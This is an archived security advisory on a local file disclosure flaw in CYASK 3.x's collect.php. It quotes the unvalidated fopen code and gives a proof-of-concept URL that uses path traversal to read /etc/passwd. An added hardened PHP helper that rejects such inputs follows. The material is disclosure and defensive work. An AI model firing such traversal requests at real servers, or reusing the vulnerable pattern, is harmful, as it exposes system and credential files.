CYASK 3.x collect.php neturl Local File Disclosure Vulnerability
xy7, 09/18/2008

This vulnerability lets an attacker read any file on a web server that has CYASK installed.

The $neturl variable in collect.php is not sufficiently validated. After registering a new user, an attacker passes the user check and can then submit any filename in $neturl, which collect.php will open and read.

The vulnerable code looks like this:

$url=get_referer();
$neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);

$collect_url=empty($neturl) ? $url : $neturl;

$contents = '';
if($fid=@fopen($collect_url,"r"))
{
    do
    {
        $data = fread($fid, 4096);
        if (strlen($data) == 0)
        {
            break;
        }
        $contents .= $data;
    }
    while(true);
    fclose($fid);
}

POC:
http://XXX.com/collect.php?neturl=../../../etc/passwd

# milw0rm.com [2008-09-18]
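
A hardened form of the neturl handling, as an added example that is not part of the original advisory or of CYASK. The helper name safe_collect_url() is hypothetical, and the example assumes the feature only ever needs to fetch remote http(s) pages.

```php
<?php
// Added example, not CYASK code. safe_collect_url() is a hypothetical helper.
// Assumption: the feature only ever needs to fetch remote http(s) pages.

function safe_collect_url(string $raw): ?string
{
    $raw   = trim($raw);
    $parts = parse_url($raw);
    // Relative or local paths such as ../../../etc/passwd have no scheme/host.
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Allowlist schemes; this refuses file:// and every other stream wrapper.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Resolve the host and refuse loopback, private and reserved addresses,
    // so the fetch cannot be pointed at internal services instead of files.
    $host = $parts['host'];
    $ips  = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : (gethostbynamel($host) ?: []);
    if ($ips === []) {
        return null;
    }
    foreach ($ips as $ip) {
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return null;
        }
    }
    return $raw;
}

// Constructed sample inputs (IP literals, so no DNS lookup is needed).
$samples = [
    '../../../etc/passwd',          // the value from the PoC above
    'file:///etc/passwd',
    'http://127.0.0.1/status',
    'https://203.0.113.7/faq.html', // documentation-range address
];
foreach ($samples as $neturl) {
    $collect_url = safe_collect_url($neturl);
    printf("%-32s => %s\n", $neturl, $collect_url === null ? 'rejected' : 'accepted');
    // Only a validated URL would ever reach fopen($collect_url, 'r').
}
```

The address check and the later fetch resolve the host name separately, so a deployment that needs a strong guarantee should connect to the vetted IP address directly.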